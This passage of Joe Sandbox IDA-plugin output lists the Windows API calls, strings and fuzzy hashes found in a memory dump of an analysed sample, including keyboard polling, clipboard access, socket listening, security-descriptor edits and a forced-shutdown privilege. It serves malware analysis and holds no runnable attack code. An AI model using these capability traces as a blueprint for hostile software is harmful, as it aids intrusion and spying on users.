                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: 795984cf6495f5ea5bd464236cfe46cd5d0aa46b0f88191ca8c19ab4ecd3eeef
                    • Instruction ID: ee43ecbfb58a3a9785c61a55e1e3d3eda4c294b5c27e2a86514a2ac12647f292
                    • Opcode Fuzzy Hash: 795984cf6495f5ea5bd464236cfe46cd5d0aa46b0f88191ca8c19ab4ecd3eeef
                    • Instruction Fuzzy Hash: 7831F772502359ABDB20AB65DC85ADE73AD9F45324F104275F840D32E1DB34DE45CA98
                    APIs
                      • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D8766
                      • Part of subcall function 006D874A: GetLastError.KERNEL32(?,006D822A,?,?,?), ref: 006D8770
                      • Part of subcall function 006D874A: GetProcessHeap.KERNEL32(00000008,?,?,006D822A,?,?,?), ref: 006D877F
                      • Part of subcall function 006D874A: HeapAlloc.KERNEL32(00000000,?,006D822A,?,?,?), ref: 006D8786
                      • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006D879D
                      • Part of subcall function 006D87E7: GetProcessHeap.KERNEL32(00000008,006D8240,00000000,00000000,?,006D8240,?), ref: 006D87F3
                      • Part of subcall function 006D87E7: HeapAlloc.KERNEL32(00000000,?,006D8240,?), ref: 006D87FA
                      • Part of subcall function 006D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006D8240,?), ref: 006D880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006D825B
                    • _memset.LIBCMT ref: 006D8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006D828F
                    • GetLengthSid.ADVAPI32(?), ref: 006D82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 006D82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006D82F9
                    • GetLengthSid.ADVAPI32(?), ref: 006D8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006D8325
                    • HeapAlloc.KERNEL32(00000000), ref: 006D832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006D834D
                    • CopySid.ADVAPI32(00000000), ref: 006D8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006D8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006D83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006D83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: b58599dcbc30cd992ae331953b95d4836dc8430f2cec4b0158cf8f0fcad06ead
                    • Instruction ID: 38e776083698f29e43b8c8b03919d4c2b37ea0622468ba414f21b22e32b44d8b
                    • Opcode Fuzzy Hash: b58599dcbc30cd992ae331953b95d4836dc8430f2cec4b0158cf8f0fcad06ead
                    • Instruction Fuzzy Hash: CB613971D00219EFDF10DFA4DC48AEEBBBABF04710B14826AF815A7391DB359A15CB64
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oai$PJr$UCP)$UTF)$UTF16)
                    • API String ID: 0-1636803056
                    • Opcode ID: cc7a99b7293e620efc36614979e776272a15d53918ec65c0234045ef4cddf4bb
                    • Instruction ID: 4fec2653ac2328ec9a5bf68df4b3569e2b92042364febbe086301b14ba724869
                    • Opcode Fuzzy Hash: cc7a99b7293e620efc36614979e776272a15d53918ec65c0234045ef4cddf4bb
                    • Instruction Fuzzy Hash: CB725D71E00319DBDF24CF58C8907EEB7B6EF49310F14816AE959AB790EB749D818B90
                    APIs
                      • Part of subcall function 007010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00700038,?,?), ref: 007010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00700737
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007007D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0070086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00700AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00700ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: 45c35165d21ccd96a011c22a5098ea4278517e01510caff704cb50c536f209cb
                    • Instruction ID: 631a04631cced1da6120c447567996d713d6c61bcd247935d6d253e155f68843
                    • Opcode Fuzzy Hash: 45c35165d21ccd96a011c22a5098ea4278517e01510caff704cb50c536f209cb
                    • Instruction Fuzzy Hash: 9EE13E71204310EFCB54DF24C895E6ABBE5EF89724F04866DF44ADB2A2DB34E901CB95
                    APIs
                    • GetKeyboardState.USER32(?), ref: 006E0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 006E02C2
                    • GetKeyState.USER32(000000A0), ref: 006E02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 006E02F7
                    • GetKeyState.USER32(000000A1), ref: 006E030C
                    • GetAsyncKeyState.USER32(00000011), ref: 006E0324
                    • GetKeyState.USER32(00000011), ref: 006E0336
                    • GetAsyncKeyState.USER32(00000012), ref: 006E034E
                    • GetKeyState.USER32(00000012), ref: 006E0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 006E0378
                    • GetKeyState.USER32(0000005B), ref: 006E038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 4087ca52a56e81eeb6ae09beda2794f0aa6b20f53c005336f99c8b6b88cea220
                    • Instruction ID: fc111a0a24089d3e2778de0e2cd77f1be309b5f132681cd64f5cc4f7de2d0191
                    • Opcode Fuzzy Hash: 4087ca52a56e81eeb6ae09beda2794f0aa6b20f53c005336f99c8b6b88cea220
                    • Instruction Fuzzy Hash: AC41EB345057CB6EFF318A6588083F5BEE26F11340F18819DD6C6477C2EBE45AC887A2
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 7b42097ac4a48d1a4beab8fee45b9bfc2750d585ef4414a345cf4697759accfa
                    • Instruction ID: 28d45c0d5fa287799d727f939153e41bcfebadd92de671f823a2900f3e1828d2
                    • Opcode Fuzzy Hash: 7b42097ac4a48d1a4beab8fee45b9bfc2750d585ef4414a345cf4697759accfa
                    • Instruction Fuzzy Hash: C9216D35200214DFDB20AF64EC49B7A77AAEF44710F14C11AF9469B661CF79A801CB99
                    APIs
                      • Part of subcall function 006848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006848A1,?,?,006837C0,?), ref: 006848CE
                      • Part of subcall function 006E4CD3: GetFileAttributesW.KERNEL32(?,006E3947), ref: 006E4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 006E3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006E3B87
                    • MoveFileW.KERNEL32(?,?), ref: 006E3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006E3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006E3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006E3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 731fc19b4776f18650451557e4a8f077ff5ea1cab3ffd0bc26a2e10268ce88c2
                    • Instruction ID: 36f6d60cd4a8f447fd7af2b044c4d3d334d29f12373ec4e9608a6b0249f94d6c
                    • Opcode Fuzzy Hash: 731fc19b4776f18650451557e4a8f077ff5ea1cab3ffd0bc26a2e10268ce88c2
                    • Instruction Fuzzy Hash: 5751B33180229D9ACF55FBA1CD968EDB7BAAF14300F2442ADE40277291DF30AF09CB54
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oai$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-3807543480
                    • Opcode ID: dee9d5c6720c1a8b68e882c40b3de7b1b7b8828ccb5065c992e3b647b8f3a586
                    • Instruction ID: 718b461a04201bd37a0f85511ee134bdf914f59a405fc0ae9ef4fedcfb7c79a7
                    • Opcode Fuzzy Hash: dee9d5c6720c1a8b68e882c40b3de7b1b7b8828ccb5065c992e3b647b8f3a586
                    • Instruction Fuzzy Hash: 08A24C70A0421A8BDF24CF58C990BFDB7B6FB54314F1481AAD856A7B80DB349E86DF50
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006EF6AB
                    • Sleep.KERNEL32(0000000A), ref: 006EF6DB
                    • _wcscmp.LIBCMT ref: 006EF6EF
                    • _wcscmp.LIBCMT ref: 006EF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 006EF7A8
                    • FindClose.KERNEL32(00000000), ref: 006EF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 242b014e4a6bb614ed16509f94b8c97c2749f4ea6d596e1d584075968cd0bdb9
                    • Instruction ID: 28b0f5bfb189a5293454db1495e04736af94e58a803657c68c776397bc883eb6
                    • Opcode Fuzzy Hash: 242b014e4a6bb614ed16509f94b8c97c2749f4ea6d596e1d584075968cd0bdb9
                    • Instruction Fuzzy Hash: 3141AF7190134A9FCF60EF64CC89AEEBBB6FF05310F14456AE815A22A1DB309E44CF94
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: def3938d9884368c591f19d2303eb2d0c71948cab5b5a0cbce1acac0767df3c0
                    • Instruction ID: 02d5f1f3fb807e48e556354d73f3b2f1884fd5009cc61a56b958516603f2cbf1
                    • Opcode Fuzzy Hash: def3938d9884368c591f19d2303eb2d0c71948cab5b5a0cbce1acac0767df3c0
                    • Instruction Fuzzy Hash: 6B128B70E00609DFEF14DFA5D981AEEB7BAFF48300F14826AE446A7251EB35AD11CB54
                    APIs
                      • Part of subcall function 006A0FF6: std::exception::exception.LIBCMT ref: 006A102C
                      • Part of subcall function 006A0FF6: __CxxThrowException@8.LIBCMT ref: 006A1041
                    • _memmove.LIBCMT ref: 006D062F
                    • _memmove.LIBCMT ref: 006D0744
                    • _memmove.LIBCMT ref: 006D07EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZi
                    • API String ID: 1300846289-3495683823
                    • Opcode ID: 26ffdffad58a6b3ca31340ae1c3e0aa72c9c54a78c1da6a015b2bf515ce59aa1
                    • Instruction ID: 3ddf862cd302fb76e673db8d8e156c26a4be1f8bc1e1e42547f3230dd7f2d89e
                    • Opcode Fuzzy Hash: 26ffdffad58a6b3ca31340ae1c3e0aa72c9c54a78c1da6a015b2bf515ce59aa1
                    • Instruction Fuzzy Hash: 51025CB0E00209DFDF45EF64D981AAEBBB6EF44300F14806AE806DB355EB35DA51CB95
                    APIs
                      • Part of subcall function 006D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006D8D0D
                      • Part of subcall function 006D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006D8D3A
                      • Part of subcall function 006D8CC3: GetLastError.KERNEL32 ref: 006D8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 006E549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 458fea445fd113b0920504f9a080f33464079f0759e7400f080afe11d5511f34
                    • Instruction ID: d6348eb82352eab458c75b69aee986025e070c0f0a23aa100c10aef886111442
                    • Opcode Fuzzy Hash: 458fea445fd113b0920504f9a080f33464079f0759e7400f080afe11d5511f34
                    • Instruction Fuzzy Hash: 47014731657B55EEF7786276DC4ABFA72DAEB00746F200135FC07D62C3DA540C818294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oai
                    • API String ID: 674341424-3423572213
                    • Opcode ID: f82b49c59b1f962479a949b017b18c44c5016ba385553230814e01ec0cfc5cf4
                    • Instruction ID: 3e35bff9573d884218ccb39403578fd524378561320a0e930896d575bdf2cbe3
                    • Opcode Fuzzy Hash: f82b49c59b1f962479a949b017b18c44c5016ba385553230814e01ec0cfc5cf4
                    • Instruction Fuzzy Hash: 71229B715083119FCB64EF24C881BAAB7EAEF88714F14491DF49A97391DB30EA05CB96
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006F65EF
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F65FE
                    • bind.WSOCK32(00000000,?,00000010), ref: 006F661A
                    • listen.WSOCK32(00000000,00000005), ref: 006F6629
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6643
                    • closesocket.WSOCK32(00000000,00000000), ref: 006F6657
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: 6364ff0160a628769e68977e2b964d5a9ed53d49e1a0cc4d209f2bfaebab2f25
                    • Instruction ID: e1a0cbc288cb7273214ef7ba4d0a4cc0b1bb9b0079441d9f3b9384c188fc8872
                    • Opcode Fuzzy Hash: 6364ff0160a628769e68977e2b964d5a9ed53d49e1a0cc4d209f2bfaebab2f25
                    • Instruction Fuzzy Hash: 4D216D316002049FCB50EF64C885B7EB7AAEF49720F148259FA56E73D1CB74AD018B6A
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 006819FA
                    • GetSysColor.USER32(0000000F), ref: 00681A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00681A61
                      • Part of subcall function 00681290: DefDlgProcW.USER32(?,00000020,?), ref: 006812D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: da6cfd4f515a62b54f0ca6ae6a3339774991a8f50b94c6db48b6de04cc842021
                    • Instruction ID: 40a54bf9d0503cdd0f6be4c39bc8d4091f42783167ecabb6472b64df645ced74
                    • Opcode Fuzzy Hash: da6cfd4f515a62b54f0ca6ae6a3339774991a8f50b94c6db48b6de04cc842021
                    • Instruction Fuzzy Hash: 70A104B1105544FADA29BB28DC99DFB299FDB43341B14431AF402DE2D2DF688D83937A
                    APIs
                      • Part of subcall function 006F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006F80CB
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006F6AB1
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6ADA
                    • bind.WSOCK32(00000000,?,00000010), ref: 006F6B13
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6B20
                    • closesocket.WSOCK32(00000000,00000000), ref: 006F6B34
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 39a04267573d446682836982bf562abb0d47118342be1ccfeb3ae200dcf90d09
                    • Instruction ID: 25736022f257b474d53a476cb247efd40e1af5fd1b59ce2b0b628053e1108f0f
                    • Opcode Fuzzy Hash: 39a04267573d446682836982bf562abb0d47118342be1ccfeb3ae200dcf90d09
                    • Instruction Fuzzy Hash: 3041E635700214AFEB50BF64DC86F7E77A69B08710F48825CFA5AAB3C2DA705D0187A5
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 5d114b4d0ec9c82484816c62600f1603b72ea44a854a83592fbbca88d5db8bc1
                    • Instruction ID: eb7050fb724c502149b92b50582cce8dc554c5f281e1a4109acbf2731d8eaadf
                    • Opcode Fuzzy Hash: 5d114b4d0ec9c82484816c62600f1603b72ea44a854a83592fbbca88d5db8bc1
                    • Instruction Fuzzy Hash: B9119431700911EFEB216F26DC44A2F77DDEF44B21B858629F846D7281CB799901CEA9
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,006C1D88,?), ref: 006FC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006FC324
                    Strings
                    Memory Dump Source
